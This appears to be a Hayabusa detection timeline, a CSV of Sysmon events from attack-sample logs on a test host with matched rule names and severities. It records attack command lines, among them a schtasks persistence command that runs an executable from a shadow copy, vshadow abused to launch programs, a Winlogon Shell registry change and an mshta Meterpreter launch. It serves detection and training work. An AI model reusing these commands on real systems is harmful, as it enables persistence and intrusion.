+2019-05-28 00:12:54.632 +09:00,IEWIN7,1,info,,Process Created,Cmd: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | Process: \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x3e7 | PID: 1260 | PGUID: 365ABB72-FE76-5CEB-0000-001015780C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:54.632 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:59.519 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 4012 | PGUID: 365ABB72-FE7B-5CEB-0000-0010867F0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:59.578 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: C:\Windows\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" | Process: C:\Windows\System32\schtasks.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" | LID: 0x3e7 | PID: 4044 | PGUID: 365ABB72-FE7B-5CEB-0000-0010D6820C00 | Hash: SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 11:13:52.171 +09:00,IEWIN7,1,info,,Process Created,"Cmd: vshadow.exe -nw -exec=c:\windows\System32\osk.exe c:\ | Process: C:\ProgramData\vshadow.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14a73 | PID: 2432 | PGUID: 365ABB72-9960-5CEC-0000-0010B6981600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
+2019-05-28 11:13:52.429 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Process Launched via DCOM | Cmd: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot11"" """" """" ""6350c17eb"" ""00000000"" ""000005AC"" ""00000590"" | Process: C:\Windows\System32\drvinst.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1968 | PGUID: 365ABB72-9960-5CEC-0000-001082AD1600 | Hash: SHA1=2D42A8EABA2829A1641FC580DA5E337C75997A99,MD5=44DAF0A410AB80E7CAB7C12EDE5FFB34,SHA256=3493630EE740508D0DB760A7648470F2987752D9B205CCCA805A66C3524E2B58,IMPHASH=ED4425CF217058DA6BDF611263E571DD",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
+2019-05-28 11:13:53.507 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: IEWIN7\IEUser | Parent Cmd: utilman.exe /debug | LID: 0x14a73 | PID: 2600 | PGUID: 365ABB72-9961-5CEC-0000-0010E1161700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
+2019-05-28 11:14:48.819 +09:00,IEWIN7,1,info,,Process Created,"Cmd: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\ | Process: C:\ProgramData\vshadow.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14a73 | PID: 3092 | PGUID: 365ABB72-9998-5CEC-0000-00107D501700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
+2019-05-28 11:14:49.194 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Process Launched via DCOM | Cmd: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot12"" """" """" ""6d110b0a3"" ""00000000"" ""000005B8"" ""000004B0"" | Process: C:\Windows\System32\drvinst.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1128 | PGUID: 365ABB72-9999-5CEC-0000-0010EB5A1700 | Hash: SHA1=2D42A8EABA2829A1641FC580DA5E337C75997A99,MD5=44DAF0A410AB80E7CAB7C12EDE5FFB34,SHA256=3493630EE740508D0DB760A7648470F2987752D9B205CCCA805A66C3524E2B58,IMPHASH=ED4425CF217058DA6BDF611263E571DD",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
+2019-05-28 11:14:50.413 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\windows\System32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\ | LID: 0x14a73 | PID: 1516 | PGUID: 365ABB72-999A-5CEC-0000-0010C3A11700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
+2019-05-29 08:09:38.589 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Startup User Shell Folder Modified | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\startup: c:\programdata\StartupNewHomeAddress | Process: C:\Windows\system32\reg.exe | PID: 1520 | PGUID: 365ABB72-BFB2-5CED-0000-0010F2C03600,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_startup_UserShellStartup_Folder_Changed_sysmon_13.evtx
+2019-06-15 07:22:17.988 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | Process: C:\Users\IEUser\Downloads\a.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1336d | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:21.503 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | Process: C:\Users\IEUser\Downloads\a.exe | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:21.535 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - Winlogon Shell | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"",explorer.exe | Process: C:\Users\IEUser\Downloads\a.exe | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:21.535 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | Process: C:\Users\IEUser\Downloads\a.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | LID: 0x1336d | PID: 1008 | PGUID: 365ABB72-1E1D-5D04-0000-001003E70A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:21.535 +09:00,IEWIN7,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:31.957 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious WMI module load | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Users\IEUser\Downloads\a.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1008 | PGUID: 365ABB72-1E1D-5D04-0000-001003E70A00 | Hash: SHA1=03DC8ABDF9C9948FE6E783DCA9C6C8264D635F0A,MD5=5610B0425518D185331CB8E968D060E6,SHA256=E235186C3BF266EE9EC733D2CFF35E3A65DE039C19B14260F4054F34B5E8AD41,IMPHASH=523D1DB34FC36465E35F6201A2FD561B",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:31.957 +09:00,IEWIN7,7,info,Exec,WMI Modules Loaded,,../hayabusa-rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:32.222 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmpA185.tmp"" | Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | LID: 0x1336d | PID: 1584 | PGUID: 365ABB72-1E28-5D04-0000-0010EC030B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:47.253 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 1552 | PGUID: 365ABB72-1E37-5D04-0000-001049360B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:52.457 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\a.exe | PID: 1008 | PGUID: 365ABB72-1E1D-5D04-0000-001003E70A00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:52.503 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\a.exe | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:55.441 +09:00,IEWIN7,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 00000040 | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 688 | PGUID: 365ABB72-1E3F-5D04-0000-0010EC890B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:55.503 +09:00,IEWIN7,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 00000040 | LID: 0x3e7 | PID: 488 | PGUID: 365ABB72-1E3F-5D04-0000-0010568A0B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:55.566 +09:00,IEWIN7,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 00000040 | LID: 0x3e7 | PID: 1228 | PGUID: 365ABB72-1E3F-5D04-0000-0010FF8D0B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:55.707 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 948 | PGUID: 365ABB72-1E3F-5D04-0000-00102B9C0B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:06.691 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Process: C:\Windows\System32\dllhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 2128 | PGUID: 365ABB72-1E4A-5D04-0000-0010ECC20B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:07.019 +09:00,IEWIN7,1,info,,Process Created,Cmd: efsui.exe /efs /keybackup | Process: C:\Windows\System32\efsui.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\lsass.exe | LID: 0xbc013 | PID: 2264 | PGUID: 365ABB72-1E4A-5D04-0000-0010BACF0B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:07.082 +09:00,IEWIN7,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: IEWIN7\IEUser | Parent Cmd: winlogon.exe | LID: 0xbc013 | PID: 1628 | PGUID: 365ABB72-1E4A-5D04-0000-001016D70B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:13.894 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: IEWIN7\IEUser | Parent Cmd: winlogon.exe | LID: 0xbc013 | PID: 3448 | PGUID: 365ABB72-1E51-5D04-0000-00104C340C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:13.957 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | Process: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0xbc013 | PID: 3444 | PGUID: 365ABB72-1E51-5D04-0000-00107B380C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:13.957 +09:00,IEWIN7,1,medium,Evas,Suspicious Userinit Child Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_userinit_child.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:13.957 +09:00,IEWIN7,1,high,Persis,Logon Scripts (UserInitMprLogonScript),,../hayabusa-rules/sigma/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:13.972 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0xbc013 | PID: 3620 | PGUID: 365ABB72-1E51-5D04-0000-001065390C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:15.054 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\VBoxTray.exe"" | Process: C:\Windows\System32\VBoxTray.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xbc013 | PID: 3920 | PGUID: 365ABB72-1E52-5D04-0000-00101D700C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:16.592 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | Process: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | LID: 0xbc013 | PID: 1724 | PGUID: 365ABB72-1E54-5D04-0000-0010B7B30C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:23.405 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xbc013 | PID: 2040 | PGUID: 365ABB72-1E5B-5D04-0000-00109EF80C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:26.811 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious WMI module load | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1724 | PGUID: 365ABB72-1E54-5D04-0000-0010B7B30C00 | Hash: SHA1=03DC8ABDF9C9948FE6E783DCA9C6C8264D635F0A,MD5=5610B0425518D185331CB8E968D060E6,SHA256=E235186C3BF266EE9EC733D2CFF35E3A65DE039C19B14260F4054F34B5E8AD41,IMPHASH=523D1DB34FC36465E35F6201A2FD561B",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:26.811 +09:00,IEWIN7,7,info,Exec,WMI Modules Loaded,,../hayabusa-rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:26.999 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmp7792.tmp"" | Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | LID: 0xbc013 | PID: 2980 | PGUID: 365ABB72-1E5E-5D04-0000-0010EF5E0D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:53.358 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Process: C:\Windows\System32\dllhost.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0xbc013 | PID: 3284 | PGUID: 365ABB72-1E79-5D04-0000-0010EADE0E00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 16:13:42.294 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mshta.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta"" | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\update.html | LID: 0x135a4 | PID: 652 | PGUID: 365ABB72-9AA6-5D04-0000-00109C850F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Exec,Suspicious Script Execution From Temp Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:13:44.106 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49159 (IEWIN7) | Dst: 10.0.2.18:4443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 652 | PGUID: 365ABB72-9AA6-5D04-0000-00109C850F00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:14:32.809 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Process: C:\Windows\System32\dllhost.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x135a4 | PID: 3892 | PGUID: 365ABB72-9AD8-5D04-0000-0010C08C1000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:21:50.488 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html | Process: C:\Program Files\Internet Explorer\iexplore.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x135a4 | PID: 540 | PGUID: 365ABB72-9C8E-5D04-0000-0010D0421600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:21:51.035 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:540 CREDAT:275457 /prefetch:2 | Process: C:\Program Files\Internet Explorer\iexplore.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html | LID: 0x135a4 | PID: 984 | PGUID: 365ABB72-9C8E-5D04-0000-001080561600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
